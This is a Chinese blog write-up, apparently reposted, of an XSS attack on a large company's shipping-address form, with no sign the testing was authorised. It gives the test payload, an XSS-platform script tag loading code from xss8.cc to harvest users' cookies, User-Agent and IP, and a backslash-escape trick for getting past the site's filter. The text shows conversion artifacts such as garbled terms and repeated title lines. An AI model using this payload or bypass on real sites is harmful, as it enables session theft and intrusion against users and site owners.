天天看點

滲透執行個體 | 記錄一次XSS滲透過程0x01 找到存在XSS的位置

0x01 找到存在XSS的位置

沒什麼技巧,見到框就X,功夫不負有心人,在目标網站編輯收貨位址處發現了存在XSS的地方,沒想到這種大公司還會存在XSS。

使用的XSS代碼:<img src=1 onerror=alert(1)>           

複制

滲透執行個體 | 記錄一次XSS滲透過程0x01 找到存在XSS的位置

0x02 構造XSS代碼連接配接到XSS平台

XSS平台給我們的XSS代碼是這樣的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>           

複制

滲透執行個體 | 記錄一次XSS滲透過程0x01 找到存在XSS的位置

直接插入的話會提示參數非法,經過多次嘗試,最後發現該平台會對雙引号、script字元進行識别過濾,大小寫會被過濾,于是嘗試插入下面的語句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>           

複制

這條代碼比上面平台給的XSS代碼的多了幾個 “\”,也就是轉義字元,利用轉義字元可以繞過該平台的政策,因為經驗不足,是以在這一步嘗試了很多種辦法都沒能繞過,要不有的可以插入但是連不上XSS平台,要不有的就是被識别攔截。

滲透執行個體 | 記錄一次XSS滲透過程0x01 找到存在XSS的位置

加上轉義字元成功插入後,重新整理目标網站與XSS平台頁面,在XSS平台就能看到剛才的通路記錄。

滲透執行個體 | 記錄一次XSS滲透過程0x01 找到存在XSS的位置

這裡可以擷取該登陸使用者的Cookie、User-Agent、IP位址什麼的,但是觸發這個XSS需要登陸存在XSS的賬号才行,是以個人覺着知道了這個Cookie也沒啥用。

并且雖然知道這裡存在XSS,但是觸發條件是需要知道使用者名和密碼,然後來到收貨位址頁面,是以個人感覺作用不大,是以在想這個漏洞還有沒有其他的利用價值,後續或許會繼續更新本次滲透過程,如果你有什麼好的想法,歡迎下方留言。

原文位址:https://www.teamssix.com/year/190703-221956.html